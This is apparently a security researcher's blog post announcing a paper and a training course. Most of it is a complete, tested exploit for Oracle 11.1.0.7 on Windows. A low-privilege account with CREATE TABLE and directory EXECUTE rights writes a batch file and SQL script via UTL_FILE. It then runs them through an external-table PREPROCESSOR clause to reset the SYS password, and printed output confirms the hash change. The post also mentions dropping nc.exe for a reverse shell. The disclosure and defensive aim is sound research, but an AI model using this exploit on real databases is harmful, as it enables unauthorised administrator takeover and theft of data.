CREATE TABLE to OSDBA
I have written a new paper entitled CREATE TABLE to OSDBA with reverse shell. The paper includes demo code for 11.1.0.7 Windows and UNIX (but not 10g).
The demo shows that granting EXECUTE on a directory in 11g to a user that possesses the common CREATE TABLE privilege is effectively equivalent to granting them OSDBA.
Once an OS based shell script is written via the still PUBLICly executable UTL_FILE and executed by SELECTING the table the .sh can act on any part of the OS owned by Oracle thus bypassing any Oracle directory controls.
I will be discussing how to protect against this as well as the growing number of unpublished 11g “CREATE SESSION to DBA” zero days, in the new SANS DAMS and Oracle 11g security course. Build up your flood defenses in preparation by attending the session below on December 5th
http://www.sans.org/london09/description.php?tid=3602
Here’s the demo for Windows (see paper for UNIX OSDBA reverse shell demo).
--Prepare the low privilege attacker account
SQL> create user ctto identified by ctto;
User created.
SQL> grant create session to ctto;
Grant succeeded.
SQL> grant create table to ctto;
Grant succeeded.
SQL> grant all on directory log_dir to public;
Grant succeeded.
SQL> conn ctto/ctto
Connected.
SQL> select * from user_role_privs;
no rows selected
SQL> select * from user_sys_privs;
USERNAME PRIVILEGE ADM
------------------------------ ---------------------------------------- ---
CTTO CREATE SESSION NO
CTTO CREATE TABLE NO
SQL> select * from user_tab_privs;
no rows selected
--Low priv ctto account looks for a directory left open, which is usually the case. On 10g this would give READ/WRITE
--but on 11g there is the new EXECUTE privilege thus allowing commands to be executed via the Directory.
SELECT TABLE_NAME FROM ALL_TAB_PRIVS WHERE TABLE_NAME IN
(SELECT OBJECT_NAME FROM ALL_OBJECTS WHERE OBJECT_TYPE='DIRECTORY')
and privilege='EXECUTE' ORDER BY GRANTEE;
TABLE_NAME
------------------------------
LOG_DIR
SQL> SELECT DIRECTORY_PATH FROM ALL_DIRECTORIES WHERE DIRECTORY_NAME='LOG_DIR';
DIRECTORY_PATH
--------------------------------------------------------------------------
C:\SCRIPTS
Windows CREATE TABLE to SYSDBA and OSDBA
--Write a batch file to the OS that will call the second .sql (using PUBLIC UTL_FILE execute)
declare
f utl_file.file_type;
s varchar2(200) := 'sqlplus -S -L / as sysdba @c:\scripts\changepassword.sql';
begin
f := utl_file.fopen('LOG_DIR','changesyspw.bat','W');
utl_file.put_line(f,s);
utl_file.fclose(f);
end;
/
--write the changepassword.sql that will be called by the batch file.
declare
f utl_file.file_type;
s varchar2(200) := 'alter user sys identified by newpassword;';
begin
f := utl_file.fopen('LOG_DIR','changepassword.sql','W');
utl_file.put_line(f,s);
utl_file.fclose(f);
end;
/
--Execute shell script via external table http://structureddata.org/2008/11/19/preprocessor-for-external-tables/
CREATE TABLE execute_mybinary( "testrow" VARCHAR2(60))
ORGANIZATION EXTERNAL(
TYPE oracle_loader DEFAULT DIRECTORY LOG_DIR
ACCESS PARAMETERS (
RECORDS DELIMITED BY NEWLINE
PREPROCESSOR LOG_DIR:'changesyspw.bat' OPTIONS '-R'
BADFILE LOG_DIR:'execute_mybinary.bad'
LOGFILE LOG_DIR:'execute_mybinary.log'
FIELDS TERMINATED BY '|'
MISSING FIELD VALUES ARE NULL (
"testrow" ) )
LOCATION ('changesyspw.bat'))
REJECT LIMIT UNLIMITED;
--from another sys session
SQL> select password from sys.user$ where name='SYS';
PASSWORD
------------------------------
5638228DAF52805F
--as ctto low privilege user executes the .bat via the SELECT statement
select count(*) from execute_mybinary;
--You will receive an KUP-04095 error but the script will change the SYS password,
SQL> select password from sys.user$ where name='SYS';
PASSWORD
------------------------------
66A86F065449C773
--Tested and working on 11.1.0.7
SQL> select * from v$version;
BANNER
--------------------------------------------------------------------------
Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production
PL/SQL Release 11.1.0.7.0 - Production
CORE 11.1.0.7.0 Production
TNS for 32-bit Windows: Version 11.1.0.7.0 - Production
NLSRTL Version 11.1.0.7.0 – Production
Also low priv attacker can write nc.exe binary to the OS using UTL_FILE binary mode as per method outlined in http://www.oracleforensics.com/wordpress/index.php/2008/10/10/create-any-directory-to-sysdba/
Given that there will always be new unexpected attacks it is essential to monitor DB user activity via a DAMS so that suspicious activity can be alerted to. http://www.sans.org/london09/description.php?tid=3602
Cheers,
Paul
